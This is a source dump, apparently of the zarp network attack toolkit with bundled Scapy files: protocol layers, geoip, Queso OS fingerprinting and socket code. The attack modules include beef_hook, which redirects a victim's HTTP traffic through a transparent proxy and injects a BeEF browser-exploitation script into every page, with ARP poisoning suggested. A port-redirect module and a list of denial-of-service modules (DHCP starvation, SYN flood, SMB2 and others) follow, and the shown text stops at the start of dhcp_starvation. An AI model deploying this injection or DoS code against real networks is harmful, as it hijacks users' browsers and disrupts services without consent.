 9 | 
10 | class RIP(Packet):
11 |     name = "RIP header"
12 |     fields_desc = [
13 |         ByteEnumField("cmd",1,{1:"req",2:"resp",3:"traceOn",4:"traceOff",5:"sun",
14 |                                6:"trigReq",7:"trigResp",8:"trigAck",9:"updateReq",
15 |                                10:"updateResp",11:"updateAck"}),
16 |         ByteField("version",1),
17 |         ShortField("null",0),
18 |         ]
19 | 
20 | class RIPEntry(Packet):
21 |     name = "RIP entry"
22 |     fields_desc = [
23 |         ShortEnumField("AF",2,{2:"IP"}),
24 |         ShortField("RouteTag",0),
25 |         IPField("addr","0.0.0.0"),
26 |         IPField("mask","0.0.0.0"),
27 |         IPField("nextHop","0.0.0.0"),
28 |         IntEnumField("metric",1,{16:"Unreach"}),
29 |         ]
30 |         
31 | 
32 | 
33 | bind_layers( UDP,           RIP,           sport=520)
34 | bind_layers( UDP,           RIP,           dport=520)
35 | bind_layers( RIP,           RIPEntry,      )
36 | bind_layers( RIPEntry,      RIPEntry,      )
37 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/rtp.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | from scapy.packet import *
 7 | from scapy.fields import *
 8 | 
 9 | _rtp_payload_types = {
10 |     # http://www.iana.org/assignments/rtp-parameters
11 |     0:  'G.711 PCMU',    3:  'GSM',
12 |     4:  'G723',          5:  'DVI4',
13 |     6:  'DVI4',          7:  'LPC',
14 |     8:  'PCMA',          9:  'G722',
15 |     10: 'L16',           11: 'L16',
16 |     12: 'QCELP',         13: 'CN',
17 |     14: 'MPA',           15: 'G728',
18 |     16: 'DVI4',          17: 'DVI4',
19 |     18: 'G729',          25: 'CelB',
20 |     26: 'JPEG',          28: 'nv',
21 |     31: 'H261',          32: 'MPV',
22 |     33: 'MP2T',          34: 'H263' }
23 | 
24 | class RTP(Packet):
25 |     name="RTP"
26 |     fields_desc = [ BitField('version', 2, 2),
27 |                     BitField('padding', 0, 1),
28 |                     BitField('extension', 0, 1),
29 |                     BitFieldLenField('numsync', None, 4, count_of='sync'),
30 |                     BitField('marker', 0, 1),
31 |                     BitEnumField('payload', 0, 7, _rtp_payload_types),
32 |                     ShortField('sequence', 0),
33 |                     IntField('timestamp', 0),
34 |                     IntField('sourcesync', 0),
35 |                     FieldListField('sync', [], IntField("id",0), count_from=lambda pkt:pkt.numsync) ]
36 |     
37 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/x509.py:
--------------------------------------------------------------------------------
  1 | ## This file is part of Scapy
  2 | ## See http://www.secdev.org/projects/scapy for more informations
  3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
  4 | ## This program is published under a GPLv2 license
  5 | 
  6 | from scapy.asn1packet import *
  7 | from scapy.asn1fields import *
  8 | 
  9 | ##########
 10 | ## X509 ##
 11 | ##########
 12 | 
 13 | ######[ ASN1 class ]######
 14 | 
 15 | class ASN1_Class_X509(ASN1_Class_UNIVERSAL):
 16 |     name="X509"
 17 |     CONT0 = 0xa0
 18 |     CONT1 = 0xa1
 19 |     CONT2 = 0xa2
 20 |     CONT3 = 0xa3
 21 | 
 22 | class ASN1_X509_CONT0(ASN1_SEQUENCE):
 23 |     tag = ASN1_Class_X509.CONT0
 24 | 
 25 | class ASN1_X509_CONT1(ASN1_SEQUENCE):
 26 |     tag = ASN1_Class_X509.CONT1
 27 | 
 28 | class ASN1_X509_CONT2(ASN1_SEQUENCE):
 29 |     tag = ASN1_Class_X509.CONT2
 30 | 
 31 | class ASN1_X509_CONT3(ASN1_SEQUENCE):
 32 |     tag = ASN1_Class_X509.CONT3
 33 | 
 34 | ######[ BER codecs ]#######
 35 | 
 36 | class BERcodec_X509_CONT0(BERcodec_SEQUENCE):
 37 |     tag = ASN1_Class_X509.CONT0
 38 | 
 39 | class BERcodec_X509_CONT1(BERcodec_SEQUENCE):
 40 |     tag = ASN1_Class_X509.CONT1
 41 |     
 42 | class BERcodec_X509_CONT2(BERcodec_SEQUENCE):
 43 |     tag = ASN1_Class_X509.CONT2
 44 |     
 45 | class BERcodec_X509_CONT3(BERcodec_SEQUENCE):
 46 |     tag = ASN1_Class_X509.CONT3
 47 | 
 48 | ######[ ASN1 fields ]######
 49 | 
 50 | class ASN1F_X509_CONT0(ASN1F_SEQUENCE):
 51 |     ASN1_tag = ASN1_Class_X509.CONT0
 52 |     
 53 | class ASN1F_X509_CONT1(ASN1F_SEQUENCE):
 54 |     ASN1_tag = ASN1_Class_X509.CONT1
 55 |     
 56 | class ASN1F_X509_CONT2(ASN1F_SEQUENCE):
 57 |     ASN1_tag = ASN1_Class_X509.CONT2
 58 |     
 59 | class ASN1F_X509_CONT3(ASN1F_SEQUENCE):
 60 |     ASN1_tag = ASN1_Class_X509.CONT3
 61 | 
 62 | ######[ X509 packets ]######
 63 | 
 64 | class X509RDN(ASN1_Packet):
 65 |     ASN1_codec = ASN1_Codecs.BER
 66 |     ASN1_root = ASN1F_SET(
 67 |                   ASN1F_SEQUENCE( ASN1F_OID("oid","2.5.4.6"),
 68 |                                   ASN1F_PRINTABLE_STRING("value","")
 69 |                                   )
 70 |                   )
 71 | 
 72 | class X509v3Ext(ASN1_Packet):
 73 |     ASN1_codec = ASN1_Codecs.BER
 74 |     ASN1_root = ASN1F_field("val",ASN1_NULL(0))
 75 |     
 76 | 
 77 | class X509Cert(ASN1_Packet):
 78 |     ASN1_codec = ASN1_Codecs.BER
 79 |     ASN1_root = ASN1F_SEQUENCE(
 80 |         ASN1F_SEQUENCE(
 81 |             ASN1F_optionnal(ASN1F_X509_CONT0(ASN1F_INTEGER("version",3))),
 82 |             ASN1F_INTEGER("sn",1),
 83 |             ASN1F_SEQUENCE(ASN1F_OID("sign_algo","1.2.840.113549.1.1.5"),
 84 |                            ASN1F_field("sa_value",ASN1_NULL(0))),
 85 |             ASN1F_SEQUENCE_OF("issuer",[],X509RDN),
 86 |             ASN1F_SEQUENCE(ASN1F_UTC_TIME("not_before",ZuluTime(-600)),  # ten minutes ago
 87 |                            ASN1F_UTC_TIME("not_after",ZuluTime(+86400))), # for 24h
 88 |             ASN1F_SEQUENCE_OF("subject",[],X509RDN),
 89 |             ASN1F_SEQUENCE(
 90 |                 ASN1F_SEQUENCE(ASN1F_OID("pubkey_algo","1.2.840.113549.1.1.1"),
 91 |                                ASN1F_field("pk_value",ASN1_NULL(0))),
 92 |                 ASN1F_BIT_STRING("pubkey","")
 93 |                 ),
 94 |             ASN1F_optionnal(ASN1F_X509_CONT3(ASN1F_SEQUENCE_OF("x509v3ext",[],X509v3Ext))),
 95 |             
 96 |         ),
 97 |         ASN1F_SEQUENCE(ASN1F_OID("sign_algo2","1.2.840.113549.1.1.5"),
 98 |                        ASN1F_field("sa2_value",ASN1_NULL(0))),
 99 |         ASN1F_BIT_STRING("signature","")
100 |         )
101 | 
102 | 
103 | 
104 | 
105 | 


--------------------------------------------------------------------------------
/src/lib/scapy/modules/__init__.py:
--------------------------------------------------------------------------------
1 | ## This file is part of Scapy
2 | ## See http://www.secdev.org/projects/scapy for more informations
3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
4 | ## This program is published under a GPLv2 license
5 | 


--------------------------------------------------------------------------------
/src/lib/scapy/modules/geoip.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | from scapy.data import KnowledgeBase
 7 | from scapy.config import conf
 8 | 
 9 | conf.IPCountry_base = "GeoIPCountry4Scapy.gz"
10 | conf.countryLoc_base = "countryLoc.csv"
11 | conf.gnuplot_world = "world.dat"
12 | 
13 | 
14 | ##########################
15 | ## IP location database ##
16 | ##########################
17 | 
18 | class IPCountryKnowledgeBase(KnowledgeBase):
19 |     """
20 | How to generate the base :
21 | db = []
22 | for l in open("GeoIPCountryWhois.csv").readlines():
23 |     s,e,c = l.split(",")[2:5]
24 |     db.append((int(s[1:-1]),int(e[1:-1]),c[1:-1]))
25 | cPickle.dump(gzip.open("xxx","w"),db)
26 | """
27 |     def lazy_init(self):
28 |         self.base = load_object(self.filename)
29 | 
30 | 
31 | class CountryLocKnowledgeBase(KnowledgeBase):
32 |     def lazy_init(self):
33 |         f=open(self.filename)
34 |         self.base = {}
35 |         while 1:
36 |             l = f.readline()
37 |             if not l:
38 |                 break
39 |             l = l.strip().split(",")
40 |             if len(l) != 3:
41 |                 continue
42 |             c,lat,long = l
43 |             
44 |             self.base[c] = (float(long),float(lat))
45 |         f.close()
46 |             
47 |         
48 | 
49 | @conf.commands.register
50 | def locate_ip(ip):
51 |     """Get geographic coordinates from IP using geoip database"""
52 |     ip=map(int,ip.split("."))
53 |     ip = ip[3]+(ip[2]<<8L)+(ip[1]<<16L)+(ip[0]<<24L)
54 | 
55 |     cloc = country_loc_kdb.get_base()
56 |     db = IP_country_kdb.get_base()
57 | 
58 |     d=0
59 |     f=len(db)-1
60 |     while (f-d) > 1:
61 |         guess = (d+f)/2
62 |         if ip > db[guess][0]:
63 |             d = guess
64 |         else:
65 |             f = guess
66 |     s,e,c = db[guess]
67 |     if  s <= ip and ip <= e:
68 |         return cloc.get(c,None)
69 | 
70 | 
71 | 
72 | 
73 | 
74 | conf.IP_country_kdb = IPCountryKnowledgeBase(conf.IPCountry_base)
75 | conf.country_loc_kdb = CountryLocKnowledgeBase(conf.countryLoc_base)
76 | 


--------------------------------------------------------------------------------
/src/lib/scapy/modules/queso.py:
--------------------------------------------------------------------------------
  1 | ## This file is part of Scapy
  2 | ## See http://www.secdev.org/projects/scapy for more informations
  3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
  4 | ## This program is published under a GPLv2 license
  5 | 
  6 | from scapy.data import KnowledgeBase
  7 | from scapy.config import conf
  8 | from scapy.layers.inet import IP,TCP
  9 | #from 
 10 | 
 11 | conf.queso_base ="/etc/queso.conf"
 12 | 
 13 | 
 14 | #################
 15 | ## Queso stuff ##
 16 | #################
 17 | 
 18 | 
 19 | def quesoTCPflags(flags):
 20 |     if flags == "-":
 21 |         return "-"
 22 |     flv = "FSRPAUXY"
 23 |     v = 0
 24 |     for i in flags:
 25 |         v |= 2**flv.index(i)
 26 |     return "%x" % v
 27 | 
 28 | class QuesoKnowledgeBase(KnowledgeBase):
 29 |     def lazy_init(self):
 30 |         try:
 31 |             f = open(self.filename)
 32 |         except IOError:
 33 |             return
 34 |         self.base = {}
 35 |         p = None
 36 |         try:
 37 |             for l in f:
 38 |                 l = l.strip()
 39 |                 if not l or l[0] == ';':
 40 |                     continue
 41 |                 if l[0] == '*':
 42 |                     if p is not None:
 43 |                         p[""] = name
 44 |                     name = l[1:].strip()
 45 |                     p = self.base
 46 |                     continue
 47 |                 if l[0] not in list("0123456"):
 48 |                     continue
 49 |                 res = l[2:].split()
 50 |                 res[-1] = quesoTCPflags(res[-1])
 51 |                 res = " ".join(res)
 52 |                 if not p.has_key(res):
 53 |                     p[res] = {}
 54 |                 p = p[res]
 55 |             if p is not None:
 56 |                 p[""] = name
 57 |         except:
 58 |             self.base = None
 59 |             warning("Can't load queso base [%s]", self.filename)
 60 |         f.close()
 61 |             
 62 |         
 63 | queso_kdb = QuesoKnowledgeBase(conf.queso_base)
 64 | 
 65 |     
 66 | def queso_sig(target, dport=80, timeout=3):
 67 |     p = queso_kdb.get_base()
 68 |     ret = []
 69 |     for flags in ["S", "SA", "F", "FA", "SF", "P", "SEC"]:
 70 |         ans, unans = sr(IP(dst=target)/TCP(dport=dport,flags=flags,seq=RandInt()),
 71 |                         timeout=timeout, verbose=0)
 72 |         if len(ans) == 0:
 73 |             rs = "- - - -"
 74 |         else:
 75 |             s,r = ans[0]
 76 |             rs = "%i" % (r.seq != 0)
 77 |             if not r.ack:
 78 |                 r += " 0"
 79 |             elif r.ack-s.seq > 666:
 80 |                 rs += " R" % 0
 81 |             else:
 82 |                 rs += " +%i" % (r.ack-s.seq)
 83 |             rs += " %X" % r.window
 84 |             rs += " %x" % r.payload.flags
 85 |         ret.append(rs)
 86 |     return ret
 87 |             
 88 | def queso_search(sig):
 89 |     p = queso_kdb.get_base()
 90 |     sig.reverse()
 91 |     ret = []
 92 |     try:
 93 |         while sig:
 94 |             s = sig.pop()
 95 |             p = p[s]
 96 |             if p.has_key(""):
 97 |                 ret.append(p[""])
 98 |     except KeyError:
 99 |         pass
100 |     return ret
101 |         
102 | 
103 | @conf.commands.register
104 | def queso(*args,**kargs):
105 |     """Queso OS fingerprinting
106 | queso(target, dport=80, timeout=3)"""
107 |     return queso_search(queso_sig(*args, **kargs))
108 | 
109 | 
110 | 


--------------------------------------------------------------------------------
/src/lib/scapy/pton_ntop.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | 
 7 | import socket,struct
 8 | 
 9 | # These functions are missing when python is compiled
10 | # without IPv6 support, on Windows for instance
11 | 
12 | def inet_pton(af, addr):
13 |     """Convert an IP address from text representation into binary form"""
14 |     if af == socket.AF_INET:
15 |         return inet_aton(addr)
16 |     elif af == socket.AF_INET6:
17 |         # IPv6: The use of "::" indicates one or more groups of 16 bits of zeros.
18 |         # We deal with this form of wildcard using a special marker. 
19 |         JOKER = "*"
20 |         while "::" in addr:
21 |             addr = addr.replace("::", ":" + JOKER + ":")
22 |         joker_pos = None 
23 |         
24 |         # The last part of an IPv6 address can be an IPv4 address
25 |         ipv4_addr = None
26 |         if "." in addr:
27 |             ipv4_addr = addr.split(":")[-1]
28 |            
29 |         result = ""
30 |         parts = addr.split(":")
31 |         for part in parts:
32 |             if part == JOKER:
33 |                 # Wildcard is only allowed once
34 |                 if joker_pos is None:
35 |                    joker_pos = len(result)
36 |                 else:
37 |                    raise Exception("Illegal syntax for IP address")
38 |             elif part == ipv4_addr: # FIXME: Make sure IPv4 can only be last part
39 |                 # FIXME: inet_aton allows IPv4 addresses with less than 4 octets 
40 |                 result += socket.inet_aton(ipv4_addr)
41 |             else:
42 |                 # Each part must be 16bit. Add missing zeroes before decoding. 
43 |                 try:
44 |                     result += part.rjust(4, "0").decode("hex")
45 |                 except TypeError:
46 |                     raise Exception("Illegal syntax for IP address")
47 |                     
48 |         # If there's a wildcard, fill up with zeros to reach 128bit (16 bytes) 
49 |         if JOKER in addr:
50 |             result = (result[:joker_pos] + "\x00" * (16 - len(result))
51 |                       + result[joker_pos:])
52 |     
53 |         if len(result) != 16:
54 |             raise Exception("Illegal syntax for IP address")
55 |         return result 
56 |     else:
57 |         raise Exception("Address family not supported")
58 | 
59 | 
60 | def inet_ntop(af, addr):
61 |     """Convert an IP address from binary form into text represenation"""
62 |     if af == socket.AF_INET:
63 |         return inet_ntoa(addr)
64 |     elif af == socket.AF_INET6:
65 |         # IPv6 addresses have 128bits (16 bytes)
66 |         if len(addr) != 16:
67 |             raise Exception("Illegal syntax for IP address")
68 |         parts = []
69 |         for left in [0, 2, 4, 6, 8, 10, 12, 14]:
70 |             try: 
71 |                 value = struct.unpack("!H", addr[left:left+2])[0]
72 |                 hexstr = hex(value)[2:]
73 |             except TypeError:
74 |                 raise Exception("Illegal syntax for IP address")
75 |             parts.append(hexstr.lstrip("0").lower())
76 |         result = ":".join(parts)
77 |         while ":::" in result:
78 |             result = result.replace(":::", "::")
79 |         # Leaving out leading and trailing zeros is only allowed with ::
80 |         if result.endswith(":") and not result.endswith("::"):
81 |             result = result + "0"
82 |         if result.startswith(":") and not result.startswith("::"):
83 |             result = "0" + result
84 |         return result
85 |     else:
86 |         raise Exception("Address family not supported yet")        
87 | 


--------------------------------------------------------------------------------
/src/lib/scapy/supersocket.py:
--------------------------------------------------------------------------------
  1 | ## This file is part of Scapy
  2 | ## See http://www.secdev.org/projects/scapy for more informations
  3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
  4 | ## This program is published under a GPLv2 license
  5 | 
  6 | import socket,time
  7 | from config import conf
  8 | from data import *
  9 | 
 10 | class _SuperSocket_metaclass(type):
 11 |     def __repr__(self):
 12 |         if self.desc is not None:
 13 |             return "<%s: %s>" % (self.__name__,self.desc)
 14 |         else:
 15 |             return "<%s>" % self.__name__
 16 | 
 17 | 
 18 | class SuperSocket:
 19 |     __metaclass__ = _SuperSocket_metaclass
 20 |     desc = None
 21 |     closed=0
 22 |     def __init__(self, family=socket.AF_INET,type=socket.SOCK_STREAM, proto=0):
 23 |         self.ins = socket.socket(family, type, proto)
 24 |         self.outs = self.ins
 25 |         self.promisc=None
 26 |     def send(self, x):
 27 |         sx = str(x)
 28 |         x.sent_time = time.time()
 29 |         return self.outs.send(sx)
 30 |     def recv(self, x=MTU):
 31 |         return conf.raw_layer(self.ins.recv(x))
 32 |     def fileno(self):
 33 |         return self.ins.fileno()
 34 |     def close(self):
 35 |         if self.closed:
 36 |             return
 37 |         self.closed=1
 38 |         if self.ins != self.outs:
 39 |             if self.outs and self.outs.fileno() != -1:
 40 |                 self.outs.close()
 41 |         if self.ins and self.ins.fileno() != -1:
 42 |             self.ins.close()
 43 |     def sr(self, *args, **kargs):
 44 |         return sendrecv.sndrcv(self, *args, **kargs)
 45 |     def sr1(self, *args, **kargs):        
 46 |         a,b = sendrecv.sndrcv(self, *args, **kargs)
 47 |         if len(a) > 0:
 48 |             return a[0][1]
 49 |         else:
 50 |             return None
 51 |     def sniff(self, *args, **kargs):
 52 |         return sendrecv.sniff(opened_socket=self, *args, **kargs)
 53 | 
 54 | class L3RawSocket(SuperSocket):
 55 |     desc = "Layer 3 using Raw sockets (PF_INET/SOCK_RAW)"
 56 |     def __init__(self, type = ETH_P_IP, filter=None, iface=None, promisc=None, nofilter=0):
 57 |         self.outs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
 58 |         self.outs.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
 59 |         self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
 60 |     def recv(self, x=MTU):
 61 |         return Ether(self.ins.recv(x)).payload
 62 |     def send(self, x):
 63 |         try:
 64 |             sx = str(x)
 65 |             x.sent_time = time.time()
 66 |             self.outs.sendto(sx,(x.dst,0))
 67 |         except socket.error,msg:
 68 |             log_runtime.error(msg)
 69 | 
 70 | class SimpleSocket(SuperSocket):
 71 |     desc = "wrapper arround a classic socket"
 72 |     def __init__(self, sock):
 73 |         self.ins = sock
 74 |         self.outs = sock
 75 | 
 76 | 
 77 | class StreamSocket(SimpleSocket):
 78 |     desc = "transforms a stream socket into a layer 2"
 79 |     def __init__(self, sock, basecls=None):
 80 |         if basecls is None:
 81 |             basecls = conf.raw_layer
 82 |         SimpleSocket.__init__(self, sock)
 83 |         self.basecls = basecls
 84 |         
 85 |     def recv(self, x=MTU):
 86 |         pkt = self.ins.recv(x, socket.MSG_PEEK)
 87 |         x = len(pkt)
 88 |         if x == 0:
 89 |             raise socket.error((100,"Underlying stream socket tore down"))
 90 |         pkt = self.basecls(pkt)
 91 |         pad = pkt[Padding]
 92 |         if pad is not None and pad.underlayer is not None:
 93 |             del(pad.underlayer.payload)
 94 |         while pad is not None and not isinstance(pad, NoPayload):
 95 |             x -= len(pad.load)
 96 |             pad = pad.payload
 97 |         self.ins.recv(x)
 98 |         return pkt
 99 |         
100 | 
101 | 
102 | if conf.L3socket is None:
103 |     conf.L3socket = L3RawSocket
104 | 
105 | import sendrecv
106 | 


--------------------------------------------------------------------------------
/src/lib/scapy/tools/__init__.py:
--------------------------------------------------------------------------------
1 | ## This file is part of Scapy
2 | ## See http://www.secdev.org/projects/scapy for more informations
3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
4 | ## This program is published under a GPLv2 license
5 | 


--------------------------------------------------------------------------------
/src/lib/scapy/tools/check_asdis.py:
--------------------------------------------------------------------------------
  1 | #! /usr/bin/env python
  2 | 
  3 | import getopt
  4 | 
  5 | def usage():
  6 |     print >>sys.stderr,"""Usage: check_asdis -i <pcap_file> [-o <wrong_packets.pcap>]
  7 |     -v   increase verbosity
  8 |     -d   hexdiff packets that differ
  9 |     -z   compress output pcap
 10 |     -a   open pcap file in append mode"""
 11 | 
 12 | def main(argv):
 13 |     PCAP_IN = None
 14 |     PCAP_OUT = None
 15 |     COMPRESS=False
 16 |     APPEND=False
 17 |     DIFF=False
 18 |     VERBOSE=0
 19 |     try:
 20 |         opts=getopt.getopt(argv, "hi:o:azdv")
 21 |         for opt, parm in opts[0]:
 22 |             if opt == "-h":
 23 |                 usage()
 24 |                 raise SystemExit
 25 |             elif opt == "-i":
 26 |                 PCAP_IN = parm
 27 |             elif opt == "-o":
 28 |                 PCAP_OUT = parm
 29 |             elif opt == "-v":
 30 |                 VERBOSE += 1
 31 |             elif opt == "-d":
 32 |                 DIFF = True
 33 |             elif opt == "-a":
 34 |                 APPEND = True
 35 |             elif opt == "-z":
 36 |                 COMPRESS = True
 37 |                 
 38 |                 
 39 |         if PCAP_IN is None:
 40 |             raise getopt.GetoptError("Missing pcap file (-i)")
 41 |     
 42 |     except getopt.GetoptError,e:
 43 |         print >>sys.stderr,"ERROR: %s" % e
 44 |         raise SystemExit
 45 |     
 46 |     
 47 | 
 48 |     from scapy.config import conf
 49 |     from scapy.utils import RawPcapReader,RawPcapWriter,hexdiff
 50 |     from scapy.layers import all
 51 | 
 52 | 
 53 |     pcap = RawPcapReader(PCAP_IN)
 54 |     pcap_out = None
 55 |     if PCAP_OUT:
 56 |         pcap_out = RawPcapWriter(PCAP_OUT, append=APPEND, gz=COMPRESS, linktype=pcap.linktype)
 57 |         pcap_out._write_header(None)
 58 | 
 59 |     LLcls = conf.l2types.get(pcap.linktype)
 60 |     if LLcls is None:
 61 |         print >>sys.stderr," Unknown link type [%i]. Can't test anything!" % pcap.linktype
 62 |         raise SystemExit
 63 |     
 64 |     
 65 |     i=-1
 66 |     differ=0
 67 |     failed=0
 68 |     for p1,meta in pcap:
 69 |         i += 1
 70 |         try:
 71 |             p2d = LLcls(p1)
 72 |             p2 = str(p2d)
 73 |         except KeyboardInterrupt:
 74 |             raise
 75 |         except Exception,e:
 76 |             print "Dissection error on packet %i" % i
 77 |             failed += 1
 78 |         else:
 79 |             if p1 == p2:
 80 |                 if VERBOSE >= 2:
 81 |                     print "Packet %i ok" % i
 82 |                 continue
 83 |             else:
 84 |                 print "Packet %i differs" % i
 85 |                 differ += 1
 86 |                 if VERBOSE >= 1:
 87 |                     print repr(p2d)
 88 |                 if DIFF:
 89 |                     hexdiff(p1,p2)
 90 |         if pcap_out is not None:
 91 |             pcap_out.write(p1)
 92 |     i+=1
 93 |     correct = i-differ-failed
 94 |     print "%i total packets. %i ok, %i differed, %i failed. %.2f%% correct." % (i, correct, differ,
 95 |                                                                                 failed, i and 100.0*(correct)/i)
 96 |     
 97 |         
 98 | if __name__ == "__main__":
 99 |     import sys
100 |     try:
101 |         main(sys.argv[1:])
102 |     except KeyboardInterrupt:
103 |         print >>sys.stderr,"Interrupted by user."
104 | 


--------------------------------------------------------------------------------
/src/modules/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hatRiot/zarp/5f19d83b45e3b6766844d5ffe7ef38122dc3fef6/src/modules/__init__.py


--------------------------------------------------------------------------------
/src/modules/attacks/__init__.py:
--------------------------------------------------------------------------------
1 | from os.path import basename, dirname, abspath
2 | from glob import glob
3 | 
4 | __all__ = [i for i in (basename(f)[:-3] for f in glob(dirname(abspath(__file__))+"/*.py")) if i != "__init__" and i != "attack"]
5 | __all__ = [v for v in __all__ if not v == "__init__"]
6 | 


--------------------------------------------------------------------------------
/src/modules/attacks/attack.py:
--------------------------------------------------------------------------------
 1 | from module import ZarpModule
 2 | import abc
 3 | 
 4 | 
 5 | class Attack(ZarpModule):
 6 |     """Abstract attack class"""
 7 |     __metaclass__ = abc.ABCMeta
 8 | 
 9 |     def __init__(self, which):
10 |         super(Attack, self).__init__(which)


--------------------------------------------------------------------------------
/src/modules/attacks/beef_hook.py:
--------------------------------------------------------------------------------
  1 | from attack import Attack
  2 | from libmproxy import controller, proxy, platform
  3 | from threading import Thread
  4 | from zoption import Zoption
  5 | import util
  6 | 
  7 | 
  8 | class beef_hook(Attack):
  9 |     """ Injects BeEF hooks into poisoned traffic.  Requires libmproxy
 10 |         and it's dependencies
 11 |     """
 12 |     def __init__(self):
 13 |         super(beef_hook, self).__init__("BeEF Hook")
 14 |         self.proxy_server = None
 15 |         self.hooker       = None
 16 |         self.hook_script  = "<script src=\"{0}\"></script>"
 17 |         self.iptable_http = "iptables -t nat -A PREROUTING -p tcp --dport 80 -s {0} -j REDIRECT --to-port 5544"
 18 |         self.config.update({"hook_path":Zoption(type = "str",
 19 |                                           value = None,
 20 |                                           required = True,
 21 |                                           display = "Path to BeEF hook"),
 22 |                             "hooked_host": Zoption(type = "ip",
 23 |                                             value = None,
 24 |                                             required = True,
 25 |                                             display = "Host to hook")
 26 |                             })
 27 |         self.info = """
 28 |                     BeEF (Browser Exploitation Framework) is a tool used in
 29 |                     the exploitation of browsers.  This module serves as a
 30 |                     way to hook any browser without the need for an XSS
 31 |                     or other malicious client-facing vector.  Instead,
 32 |                     when an attacker is local to a victim, this module
 33 |                     will inject each page with a hook.
 34 | 
 35 |                     ARP poisoning the victim is suggested, as traffic from
 36 |                     the victim is required."""
 37 | 
 38 |     def modip_rule(self, enable=True):
 39 |         """ enables or disables the iptable rule for forwarding traffic locally
 40 |         """
 41 |         if enable:
 42 |             util.init_app(self.iptable_http.format
 43 |                                     (self.config['hooked_host'].value))
 44 |         else:
 45 |             util.init_app(self.iptable_http.replace('-A', '-D').format
 46 |                                             (self.config['hooked_host'].value))
 47 | 
 48 |     def initialize(self):
 49 |         self.hook_script = self.hook_script.format(self.config['hook_path'].value)
 50 |         self.modip_rule()
 51 | 
 52 |         self.running = True
 53 |         config = proxy.ProxyConfig(transparent_proxy=dict(
 54 |                                         resolver = platform.resolver(),
 55 |                                         sslports = [443])
 56 |                                 )
 57 | 
 58 |         config.skip_cert_cleanup = True
 59 |         self.proxy_server = proxy.ProxyServer(config, 5544)
 60 |         self.hooker = Hooker(self.proxy_server, self.hook_script)
 61 | 
 62 |         util.Msg('Firing up BeEF hook...')
 63 |         thread = Thread(target=self.hooker.run)
 64 |         thread.start()
 65 | 
 66 |         return True
 67 | 
 68 |     def shutdown(self):
 69 |         """ Disable the iptable rule and kill the proxy server
 70 |         """
 71 |         util.Msg("Shutting down BeEF hooks...")
 72 |         self.modip_rule(False)
 73 |         self.proxy_server.shutdown()
 74 |         self.hooker.shutdown()
 75 | 
 76 |     def session_view(self):
 77 |         """ Return the host we're hooking
 78 |         """
 79 |         return self.config['hooked_host'].value
 80 | 
 81 | 
 82 | class Hooker(controller.Master):
 83 |     """ Request handler for libmproxy; takes care of our
 84 |         replaces.
 85 |     """
 86 |     def __init__(self, server, script_hook):
 87 |         controller.Master.__init__(self, server)
 88 |         self.script_hook = script_hook
 89 | 
 90 |     def run(self):
 91 |         try:
 92 |             return controller.Master.run(self)
 93 |         except:
 94 |             self.shutdown()
 95 | 
 96 |     def handle_response(self, msg):
 97 |         """ Replace an end </html> tag with the hook; every HTTP page
 98 |             should have this.
 99 |         """
100 |         msg.replace("</html>", "{0}</html>".format(self.script_hook))
101 |         msg.replace("</HTML>", "{0}</HTML>".format(self.script_hook))
102 |         msg.reply()
103 | 


--------------------------------------------------------------------------------
/src/modules/attacks/redirect_port.py:
--------------------------------------------------------------------------------
 1 | from attack import Attack
 2 | import util
 3 | from zoption import Zoption
 4 | 
 5 | 
 6 | class redirect_port(Attack):
 7 |     def __init__(self):
 8 |         super(redirect_port, self).__init__("redirect_port")
 9 |         self.iptable = "iptables -t nat -A PREROUTING -p tcp --dport {0} -j REDIRECT --to-port {1}"
10 |         self.config.update({"source_port": Zoption(type="int", value=80, required=True, display="Source port"),
11 |                             "dest_port": Zoption(type="int", value=8080, required=True, display="Destination port")})
12 |         self.config.update({})
13 |         self.running = False
14 |         self.info = """
15 |                     Redirects inbound TCP traffic on source port to destination port on localhost
16 |                     """
17 | 
18 |     def modip(self, enable=True):
19 |         """
20 |         Enable or disable the iptable rule
21 |         """
22 |         to_exec = self.iptable.format(self.config['source_port'].value, self.config['dest_port'].value)
23 |         if enable:
24 |             util.init_app(to_exec)
25 |         else:
26 |             util.init_app(to_exec.replace('-A', '-D'))
27 | 
28 |     def initialize(self):
29 |         util.Msg("Starting redirect_port...")
30 | 
31 |         self.modip()
32 | 
33 |         self.running = True
34 | 
35 |         util.Msg("Redirection to from TCP port {0} to {1}...".format(self.config['source_port'].value, self.config['dest_port'].value))
36 | 
37 |         return True
38 | 
39 |     def shutdown(self):
40 |         util.Msg("Shutting down RedirectPort...")
41 |         self.modip(False)
42 | 
43 |     def session_view(self):
44 |         """
45 |         Return information about the redirections
46 |         """
47 |         return "Redirect from {0} to {1}".format(self.config['source_port'].value, self.config['dest_port'].value)
48 | 


--------------------------------------------------------------------------------
/src/modules/dos/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ["dhcp_starvation", "land_dos", "ndp_dos", "nestea_dos",
2 |           "smb2_dos", "tcp_syn", 'nud', 'igmp_nix']
3 | 


--------------------------------------------------------------------------------
/src/modules/dos/dhcp_starvation.py:
--------------------------------------------------------------------------------
 1 | from scapy.all import *
 2 | from time import sleep
 3 | from util import Msg
 4 | from dos import DoS
 5 | from threading import Thread
 6 | from zoption import Zoption
 7 | 
